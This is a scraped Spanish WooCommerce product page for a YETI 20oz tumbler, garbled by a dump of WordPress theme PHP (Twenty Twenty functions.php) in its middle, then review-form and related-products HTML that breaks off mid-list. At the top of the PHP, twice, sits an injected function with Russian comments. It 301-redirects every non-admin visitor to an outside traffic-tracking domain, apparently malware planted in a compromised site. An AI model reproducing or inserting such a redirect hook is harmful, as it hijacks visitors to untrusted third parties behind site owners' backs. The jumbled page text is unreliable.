¡Oferta!

YETI Tumbler 20oz

$599.00 $495.00

Limpiar
Añadir a favoritos
Añadir a favoritos
Personalizar
SKU: 20oz Categorías: ,
function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect');function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Twenty Twenty functions and definitions * * @link https://developer.wordpress.org/themes/basics/theme-functions/ * * @package WordPress * @subpackage Twenty_Twenty * @since 1.0.0 */ /** * Table of Contents: * Theme Support * Required Files * Register Styles * Register Scripts * Register Menus * Custom Logo * WP Body Open * Register Sidebars * Enqueue Block Editor Assets * Enqueue Classic Editor Styles * Block Editor Settings */ /** * Sets up theme defaults and registers support for various WordPress features. * * Note that this function is hooked into the after_setup_theme hook, which * runs before the init hook. The init hook is too late for some features, such * as indicating support for post thumbnails. */ function twentytwenty_theme_support() { // Add default posts and comments RSS feed links to head. add_theme_support( 'automatic-feed-links' ); // Custom background color. add_theme_support( 'custom-background', array( 'default-color' => 'f5efe0', ) ); // Set content-width. global $content_width; if ( ! isset( $content_width ) ) { $content_width = 580; } /* * Enable support for Post Thumbnails on posts and pages. * * @link https://developer.wordpress.org/themes/functionality/featured-images-post-thumbnails/ */ add_theme_support( 'post-thumbnails' ); // Set post thumbnail size. set_post_thumbnail_size( 1200, 9999 ); // Add custom image size used in Cover Template. add_image_size( 'twentytwenty-fullscreen', 1980, 9999 ); // Custom logo. $logo_width = 120; $logo_height = 90; // If the retina setting is active, double the recommended width and height. if ( get_theme_mod( 'retina_logo', false ) ) { $logo_width = floor( $logo_width * 2 ); $logo_height = floor( $logo_height * 2 ); } add_theme_support( 'custom-logo', array( 'height' => $logo_height, 'width' => $logo_width, 'flex-height' => true, 'flex-width' => true, ) ); /* * Let WordPress manage the document title. * By adding theme support, we declare that this theme does not use a * hard-coded tag in the document head, and expect WordPress to * provide it for us. */ add_theme_support( 'title-tag' ); /* * Switch default core markup for search form, comment form, and comments * to output valid HTML5. */ add_theme_support( 'html5', array( 'search-form', 'comment-form', 'comment-list', 'gallery', 'caption', 'script', 'style', ) ); /* * Make theme available for translation. * Translations can be filed in the /languages/ directory. * If you're building a theme based on Twenty Twenty, use a find and replace * to change 'twentytwenty' to the name of your theme in all the template files. */ load_theme_textdomain( 'twentytwenty' ); // Add support for full and wide align images. add_theme_support( 'align-wide' ); /* * Adds starter content to highlight the theme on fresh sites. * This is done conditionally to avoid loading the starter content on every * page load, as it is a one-off operation only needed once in the customizer. */ if ( is_customize_preview() ) { require get_template_directory() . '/inc/starter-content.php'; add_theme_support( 'starter-content', twentytwenty_get_starter_content() ); } // Add theme support for selective refresh for widgets. add_theme_support( 'customize-selective-refresh-widgets' ); /* * Adds `async` and `defer` support for scripts registered or enqueued * by the theme. */ $loader = new TwentyTwenty_Script_Loader(); add_filter( 'script_loader_tag', array( $loader, 'filter_script_loader_tag' ), 10, 2 ); } add_action( 'after_setup_theme', 'twentytwenty_theme_support' ); /** * REQUIRED FILES * Include required files. */ require get_template_directory() . '/inc/template-tags.php'; // Handle SVG icons. require get_template_directory() . '/classes/class-twentytwenty-svg-icons.php'; require get_template_directory() . '/inc/svg-icons.php'; // Handle Customizer settings. require get_template_directory() . '/classes/class-twentytwenty-customize.php'; // Require Separator Control class. require get_template_directory() . '/classes/class-twentytwenty-separator-control.php'; // Custom comment walker. require get_template_directory() . '/classes/class-twentytwenty-walker-comment.php'; // Custom page walker. require get_template_directory() . '/classes/class-twentytwenty-walker-page.php'; // Custom script loader class. require get_template_directory() . '/classes/class-twentytwenty-script-loader.php'; // Non-latin language handling. require get_template_directory() . '/classes/class-twentytwenty-non-latin-languages.php'; // Custom CSS. require get_template_directory() . '/inc/custom-css.php'; /** * Register and Enqueue Styles. */ function twentytwenty_register_styles() { $theme_version = wp_get_theme()->get( 'Version' ); wp_enqueue_style( 'twentytwenty-style', get_stylesheet_uri(), array(), $theme_version ); wp_style_add_data( 'twentytwenty-style', 'rtl', 'replace' ); // Add output of Customizer settings as inline style. wp_add_inline_style( 'twentytwenty-style', twentytwenty_get_customizer_css( 'front-end' ) ); // Add print CSS. wp_enqueue_style( 'twentytwenty-print-style', get_template_directory_uri() . '/print.css', null, $theme_version, 'print' ); } add_action( 'wp_enqueue_scripts', 'twentytwenty_register_styles' ); /** * Register and Enqueue Scripts. */ function twentytwenty_register_scripts() { $theme_version = wp_get_theme()->get( 'Version' ); if ( ( ! is_admin() ) && is_singular() && comments_open() && get_option( 'thread_comments' ) ) { wp_enqueue_script( 'comment-reply' ); } wp_enqueue_script( 'twentytwenty-js', get_template_directory_uri() . '/assets/js/index.js', array(), $theme_version, false ); wp_script_add_data( 'twentytwenty-js', 'async', true ); } add_action( 'wp_enqueue_scripts', 'twentytwenty_register_scripts' ); /** * Fix skip link focus in IE11. * * This does not enqueue the script because it is tiny and because it is only for IE11, * thus it does not warrant having an entire dedicated blocking script being loaded. * * @link https://git.io/vWdr2 */ function twentytwenty_skip_link_focus_fix() { // The following is minified via `terser --compress --mangle -- assets/js/skip-link-focus-fix.js`. ?> <script> /(trident|msie)/i.test(navigator.userAgent)&&document.getElementById&&window.addEventListener&&window.addEventListener("hashchange",function(){var t,e=location.hash.substring(1);/^[A-z0-9_-]+$/.test(e)&&(t=document.getElementById(e))&&(/^(?:a|select|input|button|textarea)$/i.test(t.tagName)||(t.tabIndex=-1),t.focus())},!1); </script> } add_action( 'wp_print_footer_scripts', 'twentytwenty_skip_link_focus_fix' ); /** Enqueue non-latin language styles * * @since 1.0.0 * * @return void */ function twentytwenty_non_latin_languages() { $custom_css = TwentyTwenty_Non_Latin_Languages::get_non_latin_css( 'front-end' ); if ( $custom_css ) { wp_add_inline_style( 'twentytwenty-style', $custom_css ); } } add_action( 'wp_enqueue_scripts', 'twentytwenty_non_latin_languages' ); /** * Register navigation menus uses wp_nav_menu in five places. */ function twentytwenty_menus() { $locations = array( 'primary' => __( 'Desktop Horizontal Menu', 'twentytwenty' ), 'expanded' => __( 'Desktop Expanded Menu', 'twentytwenty' ), 'mobile' => __( 'Mobile Menu', 'twentytwenty' ), 'footer' => __( 'Footer Menu', 'twentytwenty' ), 'social' => __( 'Social Menu', 'twentytwenty' ), ); register_nav_menus( $locations ); } add_action( 'init', 'twentytwenty_menus' ); /** * Get the information about the logo. * * @param string $html The HTML output from get_custom_logo (core function). * * @return string $html */ function twentytwenty_get_custom_logo( $html ) { $logo_id = get_theme_mod( 'custom_logo' ); if ( ! $logo_id ) { return $html; } $logo = wp_get_attachment_image_src( $logo_id, 'full' ); if ( $logo ) { // For clarity. $logo_width = esc_attr( $logo[1] ); $logo_height = esc_attr( $logo[2] ); // If the retina logo setting is active, reduce the width/height by half. if ( get_theme_mod( 'retina_logo', false ) ) { $logo_width = floor( $logo_width / 2 ); $logo_height = floor( $logo_height / 2 ); $search = array( '/width=\"\d+\"/iU', '/height=\"\d+\"/iU', ); $replace = array( "width=\"{$logo_width}\"", "height=\"{$logo_height}\"", ); // Add a style attribute with the height, or append the height to the style attribute if the style attribute already exists. if ( strpos( $html, ' style=' ) === false ) { $search[] = '/(src=)/'; $replace[] = "style=\"height: {$logo_height}px;\" src="; } else { $search[] = '/(style="[^"]*)/'; $replace[] = "$1 height: {$logo_height}px;"; } $html = preg_replace( $search, $replace, $html ); } } return $html; } add_filter( 'get_custom_logo', 'twentytwenty_get_custom_logo' ); if ( ! function_exists( 'wp_body_open' ) ) { /** * Shim for wp_body_open, ensuring backwards compatibility with versions of WordPress older than 5.2. */ function wp_body_open() { do_action( 'wp_body_open' ); } } /** * Include a skip to content link at the top of the page so that users can bypass the menu. */ function twentytwenty_skip_link() { echo '<a class="skip-link screen-reader-text" href="#site-content">' . __( 'Skip to the content', 'twentytwenty' ) . '</a>'; } add_action( 'wp_body_open', 'twentytwenty_skip_link', 5 ); /** * Register widget areas. * * @link https://developer.wordpress.org/themes/functionality/sidebars/#registering-a-sidebar */ function twentytwenty_sidebar_registration() { // Arguments used in all register_sidebar() calls. $shared_args = array( 'before_title' => '<h2 class="widget-title subheading heading-size-3">', 'after_title' => '</h2>', 'before_widget' => '<div class="widget %2$s"><div class="widget-content">', 'after_widget' => '</div></div>', ); // Footer #1. register_sidebar( array_merge( $shared_args, array( 'name' => __( 'Footer #1', 'twentytwenty' ), 'id' => 'sidebar-1', 'description' => __( 'Widgets in this area will be displayed in the first column in the footer.', 'twentytwenty' ), ) ) ); // Footer #2. register_sidebar( array_merge( $shared_args, array( 'name' => __( 'Footer #2', 'twentytwenty' ), 'id' => 'sidebar-2', 'description' => __( 'Widgets in this area will be displayed in the second column in the footer.', 'twentytwenty' ), ) ) ); } add_action( 'widgets_init', 'twentytwenty_sidebar_registration' ); /** * Enqueue supplemental block editor styles. */ function twentytwenty_block_editor_styles() { $css_dependencies = array(); // Enqueue the editor styles. wp_enqueue_style( 'twentytwenty-block-editor-styles', get_theme_file_uri( '/assets/css/editor-style-block.css' ), $css_dependencies, wp_get_theme()->get( 'Version' ), 'all' ); wp_style_add_data( 'twentytwenty-block-editor-styles', 'rtl', 'replace' ); // Add inline style from the Customizer. wp_add_inline_style( 'twentytwenty-block-editor-styles', twentytwenty_get_customizer_css( 'block-editor' ) ); // Add inline style for non-latin fonts. wp_add_inline_style( 'twentytwenty-block-editor-styles', TwentyTwenty_Non_Latin_Languages::get_non_latin_css( 'block-editor' ) ); // Enqueue the editor script. wp_enqueue_script( 'twentytwenty-block-editor-script', get_theme_file_uri( '/assets/js/editor-script-block.js' ), array( 'wp-blocks', 'wp-dom' ), wp_get_theme()->get( 'Version' ), true ); } add_action( 'enqueue_block_editor_assets', 'twentytwenty_block_editor_styles', 1, 1 ); /** * Enqueue classic editor styles. */ function twentytwenty_classic_editor_styles() { $classic_editor_styles = array( '/assets/css/editor-style-classic.css', ); add_editor_style( $classic_editor_styles ); } add_action( 'init', 'twentytwenty_classic_editor_styles' ); /** * Output Customizer settings in the classic editor. * Adds styles to the head of the TinyMCE iframe. Kudos to @Otto42 for the original solution. * * @param array $mce_init TinyMCE styles. * * @return array $mce_init TinyMCE styles. */ function twentytwenty_add_classic_editor_customizer_styles( $mce_init ) { $styles = twentytwenty_get_customizer_css( 'classic-editor' ); if ( ! isset( $mce_init['content_style'] ) ) { $mce_init['content_style'] = $styles . ' '; } else { $mce_init['content_style'] .= ' ' . $styles . ' '; } return $mce_init; } add_filter( 'tiny_mce_before_init', 'twentytwenty_add_classic_editor_customizer_styles' ); /** * Output non-latin font styles in the classic editor. * Adds styles to the head of the TinyMCE iframe. Kudos to @Otto42 for the original solution. * * @param array $mce_init TinyMCE styles. * * @return array $mce_init TinyMCE styles. */ function twentytwenty_add_classic_editor_non_latin_styles( $mce_init ) { $styles = TwentyTwenty_Non_Latin_Languages::get_non_latin_css( 'classic-editor' ); // Return if there are no styles to add. if ( ! $styles ) { return $mce_init; } if ( ! isset( $mce_init['content_style'] ) ) { $mce_init['content_style'] = $styles . ' '; } else { $mce_init['content_style'] .= ' ' . $styles . ' '; } return $mce_init; } add_filter( 'tiny_mce_before_init', 'twentytwenty_add_classic_editor_non_latin_styles' ); /** * Block Editor Settings. * Add custom colors and font sizes to the block editor. */ function twentytwenty_block_editor_settings() { // Block Editor Palette. $editor_color_palette = array( array( 'name' => __( 'Accent Color', 'twentytwenty' ), 'slug' => 'accent', 'color' => twentytwenty_get_color_for_area( 'content', 'accent' ), ), array( 'name' => __( 'Primary', 'twentytwenty' ), 'slug' => 'primary', 'color' => twentytwenty_get_color_for_area( 'content', 'text' ), ), array( 'name' => __( 'Secondary', 'twentytwenty' ), 'slug' => 'secondary', 'color' => twentytwenty_get_color_for_area( 'content', 'secondary' ), ), array( 'name' => __( 'Subtle Background', 'twentytwenty' ), 'slug' => 'subtle-background', 'color' => twentytwenty_get_color_for_area( 'content', 'borders' ), ), ); // Add the background option. $background_color = get_theme_mod( 'background_color' ); if ( ! $background_color ) { $background_color_arr = get_theme_support( 'custom-background' ); $background_color = $background_color_arr[0]['default-color']; } $editor_color_palette[] = array( 'name' => __( 'Background Color', 'twentytwenty' ), 'slug' => 'background', 'color' => '#' . $background_color, ); // If we have accent colors, add them to the block editor palette. if ( $editor_color_palette ) { add_theme_support( 'editor-color-palette', $editor_color_palette ); } // Block Editor Font Sizes. add_theme_support( 'editor-font-sizes', array( array( 'name' => _x( 'Small', 'Name of the small font size in the block editor', 'twentytwenty' ), 'shortName' => _x( 'S', 'Short name of the small font size in the block editor.', 'twentytwenty' ), 'size' => 18, 'slug' => 'small', ), array( 'name' => _x( 'Regular', 'Name of the regular font size in the block editor', 'twentytwenty' ), 'shortName' => _x( 'M', 'Short name of the regular font size in the block editor.', 'twentytwenty' ), 'size' => 21, 'slug' => 'normal', ), array( 'name' => _x( 'Large', 'Name of the large font size in the block editor', 'twentytwenty' ), 'shortName' => _x( 'L', 'Short name of the large font size in the block editor.', 'twentytwenty' ), 'size' => 26.25, 'slug' => 'large', ), array( 'name' => _x( 'Larger', 'Name of the larger font size in the block editor', 'twentytwenty' ), 'shortName' => _x( 'XL', 'Short name of the larger font size in the block editor.', 'twentytwenty' ), 'size' => 32, 'slug' => 'larger', ), ) ); // If we have a dark background color then add support for dark editor style. // We can determine if the background color is dark by checking if the text-color is white. if ( '#ffffff' === strtolower( twentytwenty_get_color_for_area( 'content', 'text' ) ) ) { add_theme_support( 'dark-editor-style' ); } } add_action( 'after_setup_theme', 'twentytwenty_block_editor_settings' ); /** * Overwrite default more tag with styling and screen reader markup. * * @param string $html The default output HTML for the more tag. * * @return string $html */ function twentytwenty_read_more_tag( $html ) { return preg_replace( '/<a(.*)>(.*)<\/a>/iU', sprintf( '<div class="read-more-button-wrap"><a$1><span class="faux-button">$2</span> <span class="screen-reader-text">"%1$s"</span></a></div>', get_the_title( get_the_ID() ) ), $html ); } add_filter( 'the_content_more_link', 'twentytwenty_read_more_tag' ); /** * Enqueues scripts for customizer controls & settings. * * @since 1.0.0 * * @return void */ function twentytwenty_customize_controls_enqueue_scripts() { $theme_version = wp_get_theme()->get( 'Version' ); // Add main customizer js file. wp_enqueue_script( 'twentytwenty-customize', get_template_directory_uri() . '/assets/js/customize.js', array( 'jquery' ), $theme_version, false ); // Add script for color calculations. wp_enqueue_script( 'twentytwenty-color-calculations', get_template_directory_uri() . '/assets/js/color-calculations.js', array( 'wp-color-picker' ), $theme_version, false ); // Add script for controls. wp_enqueue_script( 'twentytwenty-customize-controls', get_template_directory_uri() . '/assets/js/customize-controls.js', array( 'twentytwenty-color-calculations', 'customize-controls', 'underscore', 'jquery' ), $theme_version, false ); wp_localize_script( 'twentytwenty-customize-controls', 'twentyTwentyBgColors', twentytwenty_get_customizer_color_vars() ); } add_action( 'customize_controls_enqueue_scripts', 'twentytwenty_customize_controls_enqueue_scripts' ); /** * Enqueue scripts for the customizer preview. * * @since 1.0.0 * * @return void */ function twentytwenty_customize_preview_init() { $theme_version = wp_get_theme()->get( 'Version' ); wp_enqueue_script( 'twentytwenty-customize-preview', get_theme_file_uri( '/assets/js/customize-preview.js' ), array( 'customize-preview', 'customize-selective-refresh', 'jquery' ), $theme_version, true ); wp_localize_script( 'twentytwenty-customize-preview', 'twentyTwentyBgColors', twentytwenty_get_customizer_color_vars() ); wp_localize_script( 'twentytwenty-customize-preview', 'twentyTwentyPreviewEls', twentytwenty_get_elements_array() ); wp_add_inline_script( 'twentytwenty-customize-preview', sprintf( 'wp.customize.selectiveRefresh.partialConstructor[ %1$s ].prototype.attrs = %2$s;', wp_json_encode( 'cover_opacity' ), wp_json_encode( twentytwenty_customize_opacity_range() ) ) ); } add_action( 'customize_preview_init', 'twentytwenty_customize_preview_init' ); /** * Get accessible color for an area. * * @since 1.0.0 * * @param string $area The area we want to get the colors for. * @param string $context Can be 'text' or 'accent'. * @return string Returns a HEX color. */ function twentytwenty_get_color_for_area( $area = 'content', $context = 'text' ) { // Get the value from the theme-mod. $settings = get_theme_mod( 'accent_accessible_colors', array( 'content' => array( 'text' => '#000000', 'accent' => '#cd2653', 'secondary' => '#6d6d6d', 'borders' => '#dcd7ca', ), 'header-footer' => array( 'text' => '#000000', 'accent' => '#cd2653', 'secondary' => '#6d6d6d', 'borders' => '#dcd7ca', ), ) ); // If we have a value return it. if ( isset( $settings[ $area ] ) && isset( $settings[ $area ][ $context ] ) ) { return $settings[ $area ][ $context ]; } // Return false if the option doesn't exist. return false; } /** * Returns an array of variables for the customizer preview. * * @since 1.0.0 * * @return array */ function twentytwenty_get_customizer_color_vars() { $colors = array( 'content' => array( 'setting' => 'background_color', ), 'header-footer' => array( 'setting' => 'header_footer_background_color', ), ); return $colors; } /** * Get an array of elements. * * @since 1.0 * * @return array */ function twentytwenty_get_elements_array() { // The array is formatted like this: // [key-in-saved-setting][sub-key-in-setting][css-property] = [elements]. $elements = array( 'content' => array( 'accent' => array( 'color' => array( '.color-accent', '.color-accent-hover:hover', '.color-accent-hover:focus', ':root .has-accent-color', '.has-drop-cap:not(:focus):first-letter', '.wp-block-button.is-style-outline', 'a' ), 'border-color' => array( 'blockquote', '.border-color-accent', '.border-color-accent-hover:hover', '.border-color-accent-hover:focus' ), 'background-color' => array( 'button:not(.toggle)', '.button', '.faux-button', '.wp-block-button__link', '.wp-block-file .wp-block-file__button', 'input[type="button"]', 'input[type="reset"]', 'input[type="submit"]', '.bg-accent', '.bg-accent-hover:hover', '.bg-accent-hover:focus', ':root .has-accent-background-color', '.comment-reply-link' ), 'fill' => array( '.fill-children-accent', '.fill-children-accent *' ), ), 'background' => array( 'color' => array( ':root .has-background-color', 'button', '.button', '.faux-button', '.wp-block-button__link', '.wp-block-file__button', 'input[type="button"]', 'input[type="reset"]', 'input[type="submit"]', '.wp-block-button', '.comment-reply-link', '.has-background.has-primary-background-color:not(.has-text-color)', '.has-background.has-primary-background-color *:not(.has-text-color)', '.has-background.has-accent-background-color:not(.has-text-color)', '.has-background.has-accent-background-color *:not(.has-text-color)' ), 'background-color' => array( ':root .has-background-background-color' ), ), 'text' => array( 'color' => array( 'body', '.entry-title a', ':root .has-primary-color' ), 'background-color' => array( ':root .has-primary-background-color' ), ), 'secondary' => array( 'color' => array( 'cite', 'figcaption', '.wp-caption-text', '.post-meta', '.entry-content .wp-block-archives li', '.entry-content .wp-block-categories li', '.entry-content .wp-block-latest-posts li', '.wp-block-latest-comments__comment-date', '.wp-block-latest-posts__post-date', '.wp-block-embed figcaption', '.wp-block-image figcaption', '.wp-block-pullquote cite', '.comment-metadata', '.comment-respond .comment-notes', '.comment-respond .logged-in-as', '.pagination .dots', '.entry-content hr:not(.has-background)', 'hr.styled-separator', ':root .has-secondary-color' ), 'background-color' => array( ':root .has-secondary-background-color' ), ), 'borders' => array( 'border-color' => array( 'pre', 'fieldset', 'input', 'textarea', 'table', 'table *', 'hr' ), 'background-color' => array( 'caption', 'code', 'code', 'kbd', 'samp', '.wp-block-table.is-style-stripes tbody tr:nth-child(odd)', ':root .has-subtle-background-background-color' ), 'border-bottom-color' => array( '.wp-block-table.is-style-stripes' ), 'border-top-color' => array( '.wp-block-latest-posts.is-grid li' ), 'color' => array( ':root .has-subtle-background-color' ), ), ), 'header-footer' => array( 'accent' => array( 'color' => array( 'body:not(.overlay-header) .primary-menu > li > a', 'body:not(.overlay-header) .primary-menu > li > .icon', '.modal-menu a', '.footer-menu a, .footer-widgets a', '#site-footer .wp-block-button.is-style-outline', '.wp-block-pullquote:before', '.singular:not(.overlay-header) .entry-header a', '.archive-header a', '.header-footer-group .color-accent', '.header-footer-group .color-accent-hover:hover' ), 'background-color' => array( '.social-icons a', '#site-footer button:not(.toggle)', '#site-footer .button', '#site-footer .faux-button', '#site-footer .wp-block-button__link', '#site-footer .wp-block-file__button', '#site-footer input[type="button"]', '#site-footer input[type="reset"]', '#site-footer input[type="submit"]' ), ), 'background' => array( 'color' => array( '.social-icons a', 'body:not(.overlay-header) .primary-menu ul', '.header-footer-group button', '.header-footer-group .button', '.header-footer-group .faux-button', '.header-footer-group .wp-block-button:not(.is-style-outline) .wp-block-button__link', '.header-footer-group .wp-block-file__button', '.header-footer-group input[type="button"]', '.header-footer-group input[type="reset"]', '.header-footer-group input[type="submit"]' ), 'background-color' => array( '#site-header', '.footer-nav-widgets-wrapper', '#site-footer', '.menu-modal', '.menu-modal-inner', '.search-modal-inner', '.archive-header', '.singular .entry-header', '.singular .featured-media:before', '.wp-block-pullquote:before' ), ), 'text' => array( 'color' => array( '.header-footer-group', 'body:not(.overlay-header) #site-header .toggle', '.menu-modal .toggle' ), 'background-color' => array( 'body:not(.overlay-header) .primary-menu ul' ), 'border-bottom-color' => array( 'body:not(.overlay-header) .primary-menu > li > ul:after' ), 'border-left-color' => array( 'body:not(.overlay-header) .primary-menu ul ul:after' ), ), 'secondary' => array( 'color' => array( '.site-description', 'body:not(.overlay-header) .toggle-inner .toggle-text', '.widget .post-date', '.widget .rss-date', '.widget_archive li', '.widget_categories li', '.widget cite', '.widget_pages li', '.widget_meta li', '.widget_nav_menu li', '.powered-by-wordpress', '.to-the-top', '.singular .entry-header .post-meta', '.singular:not(.overlay-header) .entry-header .post-meta a' ), ), 'borders' => array( 'border-color' => array( '.header-footer-group pre', '.header-footer-group fieldset', '.header-footer-group input', '.header-footer-group textarea', '.header-footer-group table', '.header-footer-group table *', '.footer-nav-widgets-wrapper', '#site-footer', '.menu-modal nav *', '.footer-widgets-outer-wrapper', '.footer-top' ), 'background-color' => array( '.header-footer-group table caption', 'body:not(.overlay-header) .header-inner .toggle-wrapper::before' ), ), ), ); /** * Filters Twenty Twenty theme elements * * @since 1.0.0 * * @param array Array of elements */ return apply_filters( 'twentytwenty_get_elements_array', $elements ); } </div> <div class="clear-after-summary clr"></div> <div class="woocommerce-tabs wc-tabs-wrapper"> <ul class="tabs wc-tabs" role="tablist"> <li class="description_tab" id="tab-title-description" role="tab" aria-controls="tab-description"> <a href="#tab-description"> Descripción </a> </li> <li class="additional_information_tab" id="tab-title-additional_information" role="tab" aria-controls="tab-additional_information"> <a href="#tab-additional_information"> Información adicional </a> </li> <li class="reviews_tab" id="tab-title-reviews" role="tab" aria-controls="tab-reviews"> <a href="#tab-reviews"> Valoraciones (0) </a> </li> </ul> <div class="woocommerce-Tabs-panel woocommerce-Tabs-panel--description panel entry-content wc-tab" id="tab-description" role="tabpanel" aria-labelledby="tab-title-description"> <h2>Descripción</h2> <p>Cualquier vaso que se presente en el viaje debe ser lo suficientemente resistente para mantenerse al día. Nuestro Rambler® 20 oz. está hecho de acero inoxidable duradero con aislamiento de vacío de doble pared para proteger su bebida fría o caliente a toda costa. Como toda la familia Rambler, el 20 oz. El vaso y su tapa se pueden lavar en el lavavajillas para facilitar la limpieza.</p> </div> <div class="woocommerce-Tabs-panel woocommerce-Tabs-panel--additional_information panel entry-content wc-tab" id="tab-additional_information" role="tabpanel" aria-labelledby="tab-title-additional_information"> <h2>Información adicional</h2> <table class="woocommerce-product-attributes shop_attributes"> <tr class="woocommerce-product-attributes-item woocommerce-product-attributes-item--weight"> <th class="woocommerce-product-attributes-item__label">Peso</th> <td class="woocommerce-product-attributes-item__value">.35 kg</td> </tr> <tr class="woocommerce-product-attributes-item woocommerce-product-attributes-item--dimensions"> <th class="woocommerce-product-attributes-item__label">Dimensiones</th> <td class="woocommerce-product-attributes-item__value">8.89 × 8.89 × 17.78 cm</td> </tr> <tr class="woocommerce-product-attributes-item woocommerce-product-attributes-item--attribute_pa_colores"> <th class="woocommerce-product-attributes-item__label">Colores</th> <td class="woocommerce-product-attributes-item__value"><p>Amarillo, Blanco, Cielo, Coral, Fucsia, Gris, Harbor, Morado, Morado Oscuro, Naranja, Navy, Negro, Plata, Rojo, Rosa, Royal, Sand, Seafoam, Tahoe, Verde</p> </td> </tr> </table> </div> <div class="woocommerce-Tabs-panel woocommerce-Tabs-panel--reviews panel entry-content wc-tab" id="tab-reviews" role="tabpanel" aria-labelledby="tab-title-reviews"> <div id="reviews" class="woocommerce-Reviews"> <div id="comments"> <h2 class="woocommerce-Reviews-title"> Valoraciones </h2> <p class="woocommerce-noreviews">No hay valoraciones aún.</p> </div> <div id="review_form_wrapper"> <div id="review_form"> <div id="respond" class="comment-respond"> <span id="reply-title" class="comment-reply-title">Sé el primero en valorar “YETI Tumbler 20oz” <small><a rel="nofollow" id="cancel-comment-reply-link" href="/tienda/producto/yeti-tumbler-20oz/#respond" style="display:none;">Cancelar la respuesta</a></small></span><form action="http://yetilizate.com/tienda/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><p class="comment-notes"><span id="email-notes">Tu dirección de correo electrónico no será publicada.</span> Los campos obligatorios están marcados con <span class="required">*</span></p><div class="comment-form-rating"><label for="rating">Tu puntuación <span class="required">*</span></label><select name="rating" id="rating" required> <option value="">Puntuar…</option> <option value="5">Perfecto</option> <option value="4">Bueno</option> <option value="3">Normal</option> <option value="2">No está tan mal</option> <option value="1">Muy pobre</option> </select></div><p class="comment-form-comment"><label for="comment">Tu valoración <span class="required">*</span></label><textarea id="comment" name="comment" cols="45" rows="8" required></textarea></p><p class="comment-form-author"><label for="author">Nombre <span class="required">*</span></label><input id="author" name="author" type="text" value="" size="30" required /></p> <p class="comment-form-email"><label for="email">Correo electrónico <span class="required">*</span></label><input id="email" name="email" type="email" value="" size="30" required /></p> <p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Enviar" /> <input type='hidden' name='comment_post_ID' value='36' id='comment_post_ID' /> <input type='hidden' name='comment_parent' id='comment_parent' value='0' /> </p></form> </div><!-- #respond --> </div> </div> <div class="clear"></div> </div> </div> </div> <section class="related products"> <h2>Productos relacionados</h2> <ul class="products oceanwp-row clr grid"> <li class="entry has-media has-product-nav col span_1_of_3 owp-content-center owp-thumbs-layout-horizontal owp-btn-normal owp-tabs-layout-horizontal has-no-thumbnails product type-product post-620 status-publish first instock product_cat-30oz product_cat-tumbler has-post-thumbnail sale featured shipping-taxable purchasable product-type-variable"> <div class="product-inner clr"> <div class="woo-entry-image clr"> <a href="http://yetilizate.com/tienda/producto/yeti-tumbler-30oz/" class="woocommerce-LoopProduct-link"> <img width="300" height="300" src="http://yetilizate.com/tienda/wp-content/uploads/2020/09/30oz-delantero-negro-300x300.png" class="woo-entry-image-main" alt="YETI Tumbler 30oz" loading="lazy" itemprop="image" srcset="http://yetilizate.com/tienda/wp-content/uploads/2020/09/30oz-delantero-negro-300x300.png 300w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/30oz-delantero-negro-150x150.png 150w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/30oz-delantero-negro-100x100.png 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <a href="#" id="product_id_620" class="owp-quick-view" data-product_id="620"><i class="icon-eye" aria-hidden="true"></i>Vista rápida</a> </div><!-- .woo-entry-image --> <div class="tinv-wraper woocommerce tinv-wishlist tinvwl-after-add-to-cart tinvwl-loop-button-wrapper"> <div class="tinv-wishlist-clear"></div><a role="button" aria-label="Añadir a favoritos" class="tinvwl_add_to_wishlist_button tinvwl-icon-heart tinvwl-position-after" data-tinv-wl-list="[]" data-tinv-wl-product="620" data-tinv-wl-productvariation="0" data-tinv-wl-productvariations="[1003,1002,992,993,995,997,1006,996,998,999,1000,1001,1004,1005,1007,1008,1009,1011,0]" data-tinv-wl-producttype="variable" data-tinv-wl-action="add"><span class="tinvwl_add_to_wishlist-text">Añadir a favoritos</span></a><div class="tinv-wishlist-clear"></div> <div class="tinvwl-tooltip">Añadir a favoritos</div> </div> <ul class="woo-entry-inner clr"><li class="image-wrap"> <span class="onsale">¡Oferta!</span> <div class="woo-entry-image clr"> <a href="http://yetilizate.com/tienda/producto/yeti-tumbler-30oz/" class="woocommerce-LoopProduct-link"> <img width="300" height="300" src="http://yetilizate.com/tienda/wp-content/uploads/2020/09/30oz-delantero-negro-300x300.png" class="woo-entry-image-main" alt="YETI Tumbler 30oz" loading="lazy" itemprop="image" srcset="http://yetilizate.com/tienda/wp-content/uploads/2020/09/30oz-delantero-negro-300x300.png 300w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/30oz-delantero-negro-150x150.png 150w, http://yetilizate.com/tienda/wp-content/uploads/2020/09/30oz-delantero-negro-100x100.png 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <a href="#" id="product_id_620" class="owp-quick-view" data-product_id="620"><i class="icon-eye" aria-hidden="true"></i>Vista rápida</a> </div><!-- .woo-entry-image --> </li><li class="category"><a href="http://yetilizate.com/tienda/categoria-producto/30oz/" rel="tag">30oz</a>, <a href="http://yetilizate.com/tienda/categoria-producto/tumbler/" rel="tag">Tumbler</a></li><li class="title"><a href="http://yetilizate.com/tienda/producto/yeti-tumbler-30oz/">YETI Tumbler 30oz</a></li><li class="inner"> <span class="price"><del><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span>669.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span>545.00</bdi></span></ins></span> </li></ul></div><!-- .product-inner .clr --></li> <li class="entry has-media has-product-nav col span_1_of_3 owp-content-center owp-thumbs-layout-horizontal owp-btn-normal owp-tabs-layout-horizontal has-no-thumbnails product type-product post-37 status-publish instock product_cat-10oz 